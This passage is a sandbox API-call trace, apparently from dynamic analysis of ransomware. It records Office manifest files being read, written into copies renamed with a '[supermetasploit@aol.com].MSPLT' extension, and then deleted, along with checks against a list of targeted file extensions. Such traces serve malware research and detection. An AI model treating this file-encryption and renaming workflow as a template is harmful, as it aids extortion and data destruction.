(lpString="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 53 [0182.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0182.972] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=1261) returned 1 [0182.972] CloseHandle (hObject=0x2e8) returned 1 [0182.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0182.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0182.973] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.973] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.974] GetLastError () returned 0x0 [0182.974] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x4ed, lpOverlapped=0x0) returned 1 [0182.977] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x4f0, lpOverlapped=0x0) returned 1 [0182.978] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0182.978] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.978] SetEndOfFile (hFile=0x368) returned 1 [0182.978] CloseHandle (hObject=0x368) returned 1 [0182.985] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.985] SetEndOfFile (hFile=0x2e8) returned 1 [0182.986] CloseHandle (hObject=0x2e8) returned 1 [0182.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 1 [0182.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.987] lstrlenW (lpString=".doc") returned 4 [0182.987] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.987] lstrlenW (lpString=".docx") returned 5 [0182.987] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.987] lstrlenW (lpString=".pdf") returned 4 [0182.987] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.987] lstrlenW (lpString=".xls") returned 4 [0182.987] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.987] lstrlenW (lpString=".xlsx") returned 5 [0182.987] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.987] lstrlenW (lpString=".ppt") returned 4 [0182.987] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString=".zip") returned 4 [0182.988] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.988] lstrlenW (lpString=".rar") returned 4 [0182.988] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString=".bz2") returned 4 [0182.988] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString=".7z") returned 3 [0182.988] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString=".dbf") returned 4 [0182.988] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString=".1cd") returned 4 [0182.988] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString=".jpg") returned 4 [0182.988] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.988] lstrlenW (lpString=".doc") returned 4 [0182.988] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString=".docx") returned 5 [0182.988] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.988] lstrlenW (lpString=".pdf") returned 4 [0182.988] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.988] lstrlenW (lpString=".xls") returned 4 [0182.988] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString=".xlsx") returned 5 [0182.989] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.989] lstrlenW (lpString=".ppt") returned 4 [0182.989] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.989] lstrlenW (lpString=".zip") returned 4 [0182.989] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.989] lstrlenW (lpString=".rar") returned 4 [0182.989] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString=".bz2") returned 4 [0182.989] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString=".7z") returned 3 [0182.989] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.989] lstrlenW (lpString=".dbf") returned 4 [0182.989] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.989] lstrlenW (lpString=".1cd") returned 4 [0182.989] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0182.989] lstrlenW (lpString=".jpg") returned 4 [0182.989] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.989] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.990] lstrlenW (lpString="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 53 [0182.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0182.990] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=1450) returned 1 [0182.990] CloseHandle (hObject=0x2e8) returned 1 [0182.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0182.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0182.991] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.991] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.991] GetLastError () returned 0x0 [0182.991] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x5aa, lpOverlapped=0x0) returned 1 [0182.993] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x5b0, lpOverlapped=0x0) returned 1 [0182.995] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0182.995] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.995] SetEndOfFile (hFile=0x368) returned 1 [0182.995] CloseHandle (hObject=0x368) returned 1 [0183.553] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.553] SetEndOfFile (hFile=0x2e8) returned 1 [0183.569] CloseHandle (hObject=0x2e8) returned 1 [0183.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.569] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 1 [0183.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.570] lstrlenW (lpString=".doc") returned 4 [0183.570] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString=".docx") returned 5 [0183.570] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.570] lstrlenW (lpString=".pdf") returned 4 [0183.570] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString=".xls") returned 4 [0183.570] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString=".xlsx") returned 5 [0183.570] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.570] lstrlenW (lpString=".ppt") returned 4 [0183.570] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.570] lstrlenW (lpString=".zip") returned 4 [0183.570] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.570] lstrlenW (lpString=".rar") returned 4 [0183.570] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString=".bz2") returned 4 [0183.570] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.570] lstrlenW (lpString=".7z") returned 3 [0183.570] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString=".dbf") returned 4 [0183.571] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString=".1cd") returned 4 [0183.571] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString=".jpg") returned 4 [0183.571] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString=".doc") returned 4 [0183.571] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString=".docx") returned 5 [0183.571] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.571] lstrlenW (lpString=".pdf") returned 4 [0183.571] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString=".xls") returned 4 [0183.571] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString=".xlsx") returned 5 [0183.571] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.571] lstrlenW (lpString=".ppt") returned 4 [0183.571] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.571] lstrlenW (lpString=".zip") returned 4 [0183.572] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.572] lstrlenW (lpString=".rar") returned 4 [0183.572] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.572] lstrlenW (lpString=".bz2") returned 4 [0183.572] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.572] lstrlenW (lpString=".7z") returned 3 [0183.572] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.572] lstrlenW (lpString=".dbf") returned 4 [0183.572] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.572] lstrlenW (lpString=".1cd") returned 4 [0183.572] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0183.572] lstrlenW (lpString=".jpg") returned 4 [0183.572] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.572] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.572] lstrlenW (lpString="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 53 [0183.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.573] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=1261) returned 1 [0183.573] CloseHandle (hObject=0x2e8) returned 1 [0183.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0183.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.573] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.574] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.574] GetLastError () returned 0x0 [0183.574] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x4ed, lpOverlapped=0x0) returned 1 [0183.576] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x4f0, lpOverlapped=0x0) returned 1 [0183.577] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0183.577] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.578] SetEndOfFile (hFile=0x368) returned 1 [0183.578] CloseHandle (hObject=0x368) returned 1 [0183.580] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.580] SetEndOfFile (hFile=0x2e8) returned 1 [0183.581] CloseHandle (hObject=0x2e8) returned 1 [0183.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 1 [0183.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.582] lstrlenW (lpString=".doc") returned 4 [0183.582] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.582] lstrlenW (lpString=".docx") returned 5 [0183.582] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.582] lstrlenW (lpString=".pdf") returned 4 [0183.582] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.582] lstrlenW (lpString=".xls") returned 4 [0183.582] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.582] lstrlenW (lpString=".xlsx") returned 5 [0183.582] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.582] lstrlenW (lpString=".ppt") returned 4 [0183.582] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.583] lstrlenW (lpString=".zip") returned 4 [0183.583] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.583] lstrlenW (lpString=".rar") returned 4 [0183.583] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.583] lstrlenW (lpString=".bz2") returned 4 [0183.583] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.583] lstrlenW (lpString=".7z") returned 3 [0183.583] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.583] lstrlenW (lpString=".dbf") returned 4 [0183.583] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.583] lstrlenW (lpString=".1cd") returned 4 [0183.583] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.583] lstrlenW (lpString=".jpg") returned 4 [0183.583] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.584] lstrlenW (lpString=".doc") returned 4 [0183.584] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString=".docx") returned 5 [0183.584] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.584] lstrlenW (lpString=".pdf") returned 4 [0183.584] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString=".xls") returned 4 [0183.584] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString=".xlsx") returned 5 [0183.584] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.584] lstrlenW (lpString=".ppt") returned 4 [0183.584] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.584] 